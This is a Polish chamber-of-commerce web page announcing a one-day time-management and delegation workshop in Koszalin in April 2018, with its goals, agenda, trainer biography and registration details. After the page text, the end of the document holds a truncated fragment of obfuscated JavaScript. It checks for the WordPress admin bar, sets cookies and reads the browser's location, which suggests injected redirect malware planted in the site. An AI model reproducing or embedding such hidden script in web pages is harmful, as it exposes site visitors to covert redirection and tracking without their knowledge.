Zarządzanie czasem „Organizacja pracy w firmie” – warsztaty | Północna Izba Gospodarcza w Koszalinie
Polnocna-Izba-warsztaty-organizacja-pracy

W natłoku obowiązków wydaje się nam, że nasz dzień jest zbyt krótki. Nie jest tak. Doba dla każdego ma 24 godziny i od sprawnego zagospodarowania czasu zależy, ile zadań zdołamy wykonać. Na warsztatach zostaną przekazane Państwu sposoby jak efektywnie zarządzać swoim czasem pracy.
Termin warsztatów: 25.04.2018
Godziny: 10:00 – 16:00
Miejsce: City Box Koszalin, Rynek Staromiejski 14
Cel szkolenia:
Wypracowanie umiejętności zarządzania sobą w czasie i planowania własnej pracy.
Rozwój umiejętności wpływających na podniesienie wśród menedżerów satysfakcji z pracy, rozwój kluczowych umiejętności sprawnego zarządzania zespołem, oraz umiejętności delegowania zadań. Rozwój metod zarządzania czasem , które doprowadzą do efektywnego realizowania wyznaczonych celów.
Korzyści dla uczestników
Po zakończonym szkoleniu uczestnicy powinni umieć zastosować następujące umiejętności:
– wiedzieć, co wpływa na organizację pracy własnej
– umieć definiować cele i ustalać priorytety realizowanych zadań
– znać i umieć zastosować narzędzia pracy podnoszące efektywność
– przygotowywać efektywne spotkania
– umieć znaleźć indywidualne rozwiązania na eliminację
„ pożeraczy” czasu
– wiedzieć komu i co delegować oraz jak kontrolować wyniki powierzonych prac

RAMOWY PLAN SZKOLENIA:

WSTĘP

 

Poznajemy się, oczekiwania słuchaczy w odniesieniu do szkolenia

Kontrakt między prowadzącym szkolenie a uczestnikami

( zapisanie zasad panujących na szkoleniu)

I KRÓTKA ANALIZA GOSPODAROWANIA CZASEM PRACY

 1. Jak gospodarujemy czasem w pracy?
 2. Identyfikacja „pożeraczy czasu” w różnych branżach

II WYZNACZANIE CELÓW- czy to konieczne?

 1. Jak skutecznie formułować cele ? ( zasada SMART)
 2. O naturze zasad
 3. Planowanie dnia
 4. Czy twoje biuro pomaga efektywnie wykorzystać czas?
 5. Bez kawy
  Bez papierosa
  Bez sensu…- czy w pracy nie ma szans na krótką przerwę?

III SZTUKA DELEGOWANIA ZADAŃ

 1. Na czym polega trudność delegowania?
 2. Sprawy, które można oddelegować
 3. Czego nie można oddelegować ?
 4. Sposoby rozwijania umiejętności zlecania zadań

IV  7 KROKÓW KU LEPSZEJ ORGANIZACJI CZASU

 1. Zawodowa Lista Spraw Niedokończonych
 2. Naturalny model planowania
 3. Lista planowanych projektów
 4. Czwartek- najważniejszy dzień tygodnia
Szkolenie 6 godzinne, poparte dużą ilością casy studies, dedykowane osobom budującym nowy zespół oraz managerom napotykającym na opór w zarządzanej przez siebie grupie.

Polnocna-Izba-warsztaty-Anna-Mozdzynska-trener

Warsztaty poprowadzi Pani Anna Możdżyńska – absolwentka Akademii Trenera na WSB w Poznaniu.

Pracuje w sektorze HoReCa od 17 lat, służąc radą i pomocą tym, którzy stawiają pierwsze kroki, oraz wszystkim nastawionym na zmianę.

Trener, wykładowca, szkoleniowiec, pilot wycieczek, przewodnik turystyczny oraz szczęśliwa żona i mama 2 córek.

 

 

 

Potwierdzenie obecności prosimy wysyłać na adres koszalin@izba.info lub telefonicznie do naszego biura. Ilość miejsc ograniczona, decyduje kolejność zgłoszeń.

Jeżeli nie odpowiadają Państwu ustalone godziny, bardzo prosimy o informację.

'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m